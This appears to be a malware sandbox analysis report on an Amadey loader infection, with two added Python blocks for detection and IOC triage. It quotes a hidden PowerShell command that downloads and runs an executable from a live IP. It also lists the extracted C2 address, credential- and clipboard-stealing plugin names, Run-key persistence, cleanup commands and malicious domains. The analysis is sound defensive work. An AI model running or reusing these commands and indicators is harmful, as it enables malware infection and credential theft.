6736, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 4764, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7056, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 7072, ProcessName: powershell.exe
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton; Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7056, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 7072, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4028, ProcessName: svchost.exe

                      Data Obfuscation

                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\mtzRdqIHD.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6736, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 4764, ProcessName: powershell.exe
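The Sigma matches above reduce to a few command-line and parent-process checks: cmd.exe spawning powershell to join random characters from the ranges 48..57, 65..90 and 97..122 into a 9-character name, and mshta.exe spawning a hidden powershell that downloads http://176.113.115.7/mine/random.exe into %TEMP% and starts it. The Python below is an added example written for this page, not part of the Joe Sandbox report or of any Sigma rule: the EVENTS list is constructed from the "Process started" fields shown above plus one benign record for contrast, and the rule names, scoring and the LOLBIN parent list are my own choices.

```python
"""Detection logic for the two PowerShell patterns flagged by Sigma above:
the mshta.exe -> powershell.exe download-and-execute chain and the
cmd.exe -> powershell.exe random-name generator. Added example for this page,
not part of the Joe Sandbox report; EVENTS is constructed from the report's
'Process started' fields plus one benign record (PID 5100) for contrast."""
import re
import ntpath

EVENTS = [
    {"ProcessId": 7072, "ParentProcessId": 7056,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'''powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"'''},
    {"ProcessId": 4764, "ParentProcessId": 6736,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;'''},
    {"ProcessId": 5100, "ParentProcessId": 4300,  # constructed benign record
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'''powershell -NoProfile -Command "Get-ChildItem $env:temp"'''},
]

RULES = {
    # WebClient download followed by execution of the result in one command line
    "download_execute": re.compile(r"DownloadFile\(.*?Start-Process", re.I | re.S),
    "hidden_window": re.compile(r"-W(indowStyle)?\s+Hidden", re.I),
    # char-range + Get-Random + [char] cast: builds a random file or folder name
    "random_name_gen": re.compile(r"Get-Random\s+-Count\s+\d+.*\[char\]", re.I),
    "remote_url": re.compile(r"https?://[\w.\-:/]+", re.I),
}
# Script hosts that should rarely be the parent of a PowerShell process (my list)
LOLBIN_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}


def classify(event):
    """Return the sorted list of rule names that fire on one process-creation event."""
    tags = [name for name, rx in RULES.items() if rx.search(event["CommandLine"])]
    if ntpath.basename(event["ParentImage"]).lower() in LOLBIN_PARENTS:
        tags.append("lolbin_parent")
    return sorted(tags)


def severity(event):
    """Simple scoring: download-and-execute from a LOLBIN parent is the worst case."""
    tags = classify(event)
    if "download_execute" in tags and "lolbin_parent" in tags:
        return "high"
    if "download_execute" in tags or "random_name_gen" in tags:
        return "medium"
    return "none"


def extract_iocs(event):
    """Pull URLs and the drop path ($env:temp + '\\name') out of the command line."""
    cmd = event["CommandLine"]
    urls = RULES["remote_url"].findall(cmd)
    drops = ["%TEMP%" + m for m in re.findall(r"\$env:temp\+'([^']+)'", cmd, re.I)]
    return {"urls": urls, "drop_paths": drops}


def triage(events):
    """Severity-ordered summary of every event that fired at least one rule."""
    rank = {"high": 0, "medium": 1}
    hits = [(e["ProcessId"], severity(e), classify(e), extract_iocs(e))
            for e in events if severity(e) != "none"]
    return sorted(hits, key=lambda h: rank[h[1]])


if __name__ == "__main__":
    for pid, sev, tags, iocs in triage(EVENTS):
        print(pid, sev, tags, iocs)
```

Running the block prints the two hits ranked by severity; the benign Get-ChildItem record produces no tags. The `download_execute` rule requires both DownloadFile and Start-Process in one command line, so a staged download (one process fetches, a second one runs the file) would need a join on ProcessId and ParentProcessId across events, which the record layout allows but this example does not perform.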
                      Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP  Destination Port  Protocol
                      2025-03-07T19:50:50.758714+0100  2028371  3         Unknown Traffic                192.168.2.8  49806        188.114.96.3    443               TCP
                      2025-03-07T19:52:22.897285+0100  2028371  3         Unknown Traffic                192.168.2.8  49695        104.21.32.1     443               TCP
                      2025-03-07T19:52:25.891206+0100  2028371  3         Unknown Traffic                192.168.2.8  49698        104.21.32.1     443               TCP
                      2025-03-07T19:52:28.849483+0100  2028371  3         Unknown Traffic                192.168.2.8  49700        104.21.32.1     443               TCP
                      2025-03-07T19:52:31.986631+0100  2028371  3         Unknown Traffic                192.168.2.8  49702        104.21.32.1     443               TCP
                      2025-03-07T19:52:36.688511+0100  2028371  3         Unknown Traffic                192.168.2.8  49704        104.21.32.1     443               TCP
                      2025-03-07T19:52:37.265032+0100  2028371  3         Unknown Traffic                192.168.2.8  49706        104.21.32.1     443               TCP
                      2025-03-07T19:52:40.129030+0100  2028371  3         Unknown Traffic                192.168.2.8  49708        104.21.32.1     443               TCP
                      2025-03-07T19:52:44.380467+0100  2028371  3         Unknown Traffic                192.168.2.8  49726        104.21.32.1     443               TCP
                      2025-03-07T19:53:02.941629+0100  2028371  3         Unknown Traffic                192.168.2.8  49779        188.114.96.3    443               TCP
                      2025-03-07T19:53:05.971117+0100  2028371  3         Unknown Traffic                192.168.2.8  49793        188.114.96.3    443               TCP
                      2025-03-07T19:53:08.971652+0100  2028371  3         Unknown Traffic                192.168.2.8  49804        188.114.96.3    443               TCP

                      Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP  Destination Port  Protocol
                      2025-03-07T19:52:05.921914+0100  2856147  1         A Network Trojan was detected  192.168.2.8  49690        176.113.115.6   80                TCP

                      Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP  Destination Port  Protocol
                      2025-03-07T19:52:10.722253+0100  2803305  3         Unknown Traffic                192.168.2.8  49692        176.113.115.7   80                TCP
                      2025-03-07T19:52:16.890841+0100  2803305  3         Unknown Traffic                192.168.2.8  49694        176.113.115.7   80                TCP
                      2025-03-07T19:52:25.032460+0100  2803305  3         Unknown Traffic                192.168.2.8  49699        176.113.115.7   80                TCP
                      2025-03-07T19:52:31.901713+0100  2803305  3         Unknown Traffic                192.168.2.8  49703        176.113.115.7   80                TCP
                      2025-03-07T19:52:38.130912+0100  2803305  3         Unknown Traffic                192.168.2.8  49707        176.113.115.7   80                TCP
                      2025-03-07T19:52:46.313749+0100  2803305  3         Unknown Traffic                192.168.2.8  49730        176.113.115.7   80                TCP
                      2025-03-07T19:52:52.652974+0100  2803305  3         Unknown Traffic                192.168.2.8  49745        176.113.115.7   80                TCP
                      2025-03-07T19:52:57.980435+0100  2803305  3         Unknown Traffic                192.168.2.8  49750        176.113.115.7   80                TCP


                      AV Detection

                      Source: https://defaulemot.run/jUSiazAaAvira URL Cloud: Label: malware
                      Source: https://defaulemot.run/jUSiaz$IAvira URL Cloud: Label: malware
                      Source: https://defaulemot.run:443/jUSiaz?Avira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Temp\10128600101\60eb3ded99.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exeAvira: detection malicious, Label: TR/AD.PSLoader.wdbmn
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Source: C:\Users\user\AppData\Local\Temp\D51OAO8D0TVNMCQXHC.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeAvira: detection malicious, Label: TR/AD.PSLoader.wdbmn
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
                      Source: am_no.batVirustotal: Detection: 23%
                      Source: am_no.batReversingLabs: Detection: 13%
                      Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: 176.113.115.6
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: /Ni9kiput/index.php
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: S-%lu-
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: bb556cff4a
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapes.exe
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Startup
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: cmd /C RMDIR /s/q
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: rundll32
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Programs
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: %USERPROFILE%
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: cred.dll|clip.dll|
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: cred.dll
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: clip.dll
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: http://
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: https://
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: /quiet
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: /Plugins/
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: &unit=
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: shell32.dll
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: kernel32.dll
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: GetNativeSystemInfo
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: ProgramData\
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: AVAST Software
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Kaspersky Lab
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Panda Security
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Doctor Web
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: 360TotalSecurity
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Bitdefender
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Norton
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Sophos
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Comodo
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: WinDefender
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: 0123456789
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: ------
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: ?scr=1
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: ComputerName
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: -unicode-
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: VideoID
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: DefaultSettings.XResolution
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: DefaultSettings.YResolution
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: ProductName
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: CurrentBuild
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: rundll32.exe
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: "taskkill /f /im "
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: " && timeout 1 && del
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: && Exit"
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: " && ren
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Powershell.exe
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: -executionpolicy remotesigned -File "
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: shutdown -s -t 0
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: random
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Keyboard Layout\Preload
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000419
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000422
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000423
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: 0000043f
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: defaulemot.run/jUSiaz
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: begindecafer.world/QwdZdf
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: garagedrootz.top/oPsoJAN
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: modelshiverd.icu/bJhnsj
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: arisechairedd.shop/JnsHY
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: catterjur.run/boSnzhu
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: orangemyther.live/IozZ
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: fostinjec.today/LksNAz
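The Amadey configuration extracted above and the decrypted strings that follow it carry the campaign's indicators in raw form: the C2 host and path, the install folder and file name, the Run and RunOnce keys and the Startup shell folder used for persistence, the cred.dll and clip.dll plugin names, the AV vendor folders probed under ProgramData\, the taskkill/del/shutdown cleanup commands, and the keyboard-layout IDs 00000419, 00000422, 00000423 and 0000043f. The Python below is an added example for this page, not sandbox output: the inputs are copied from the report, while the grouping of strings into buckets, the LCID-to-locale table (0419 ru-RU, 0422 uk-UA, 0423 be-BY, 043f kk-KZ) and the reading of those IDs as a CIS-locale exclusion check against HKCU\Keyboard Layout\Preload are my interpretation. It also cross-checks the rebuilt C2 URL against the Suricata alert tables, which is how the severity-1 alert to 176.113.115.6:80 is tied to the configuration.

```python
"""Structured triage of the Amadey configuration and decrypted strings
listed in the AV Detection section. Added example for this page: the inputs
are copied from the report; the string categories, the LCID-to-locale map and
the reading of the layout IDs as a CIS-locale check are my interpretation,
not output of the sandbox."""
import re
from urllib.parse import urlparse

CONFIG = {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21",
          "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

# Subset of the "String decryptor" lines above (copied, not constructed).
DECRYPTED = [
    "176.113.115.6", "/Ni9kiput/index.php", "bb556cff4a", "rapes.exe",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders",
    "Startup", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "cred.dll|clip.dll|", "/Plugins/", "ProgramData\\",
    "AVAST Software", "Kaspersky Lab", "Panda Security", "Doctor Web",
    "360TotalSecurity", "Bitdefender", "Norton", "Sophos", "Comodo", "WinDefender",
    '"taskkill /f /im "', '" && timeout 1 && del', "shutdown -s -t 0",
    r"Keyboard Layout\Preload", "00000419", "00000422", "00000423", "0000043f",
]

# (sid, severity, classtype, dst_ip, dst_port) from the Suricata tables above.
SURICATA = [
    (2028371, 3, "Unknown Traffic", "188.114.96.3", 443),
    (2856147, 1, "A Network Trojan was detected", "176.113.115.6", 80),
    (2803305, 3, "Unknown Traffic", "176.113.115.7", 80),
]

# Standard Windows input-locale IDs (low 16 bits of a Keyboard Layout\Preload value).
LCID_LOCALES = {"0419": "ru-RU", "0422": "uk-UA", "0423": "be-BY", "043f": "kk-KZ"}
# Vendor folder names the sample looks for under ProgramData\ (taken from the report).
AV_VENDOR_DIRS = {"AVAST Software", "Kaspersky Lab", "Panda Security", "Doctor Web",
                  "360TotalSecurity", "Bitdefender", "Norton", "Sophos", "Comodo", "WinDefender"}

IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
PATH_RE = re.compile(r"^/[\w/.-]+\.php$")
PERSIST_RE = re.compile(r"^SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$")
LCID_RE = re.compile(r"^0000[0-9a-fA-F]{4}$")
CLEANUP_RE = re.compile(r"taskkill|\bdel\b|shutdown", re.I)


def assemble_c2(strings):
    """Rebuild the C2 URL from the decrypted host and path; should equal CONFIG's."""
    host = next(s for s in strings if IPV4_RE.match(s))
    path = next(s for s in strings if PATH_RE.match(s))
    return "http://" + host + path


def amadey_iocs(config, strings):
    """Group the decrypted strings into IOC and behaviour buckets."""
    persistence = [s for s in strings if PERSIST_RE.match(s)]
    if "Startup" in strings and any(s.endswith("User Shell Folders") for s in strings):
        persistence.append("Startup folder (resolved via User Shell Folders)")
    return {
        "c2": "http://" + config["C2 url"],
        "version": config["Version"],
        "install_path": "%TEMP%\\" + config["Install Folder"] + "\\" + config["Install File"],
        # pipe-delimited plugin list, fetched from <c2 host>/Plugins/
        "plugins": sorted({p for s in strings if "|" in s for p in s.split("|") if p}),
        "persistence": persistence,
        # layout IDs compared against HKCU\Keyboard Layout\Preload (my reading: CIS exclusion)
        "locale_check": {s: LCID_LOCALES.get(s[-4:].lower(), "unknown")
                         for s in strings if LCID_RE.match(s)},
        "av_dirs": sorted(s for s in strings if s in AV_VENDOR_DIRS),
        "cleanup_cmds": [s for s in strings if CLEANUP_RE.search(s)],
    }


def c2_alerts(c2_url, alerts):
    """Return the Suricata alerts whose destination is the configured C2 host."""
    host = urlparse(c2_url).hostname
    return [a for a in alerts if a[3] == host]


if __name__ == "__main__":
    iocs = amadey_iocs(CONFIG, DECRYPTED)
    assert iocs["c2"] == assemble_c2(DECRYPTED)
    for key, value in iocs.items():
        print(f"{key}: {value}")
    print("C2 alerts:", c2_alerts(iocs["c2"], SURICATA))
```

The install path the block derives, %TEMP%\bb556cff4a\rapes.exe, matches the dropped file Avira flagged under C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe above, and the only severity-1 alert in the tables is the one whose destination equals the configured C2 host; the severity-3 "Unknown Traffic" alerts to 176.113.115.7 belong to the download server seen in the powershell command line, not to the Amadey C2.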

                      Phishing

                      Source: Yara matchFile source: Process Memory Space: ab5415a7b5.exe PID: 5236, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta, type: DROPPED
                      Source: Yara matchFile source: C:\Temp\mtzRdqIHD.hta, type: DROPPED
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49695 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49698 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49700 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49726 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49762 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49763 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49767 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49775 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49789 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49790 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49791 version: TLS 1.2
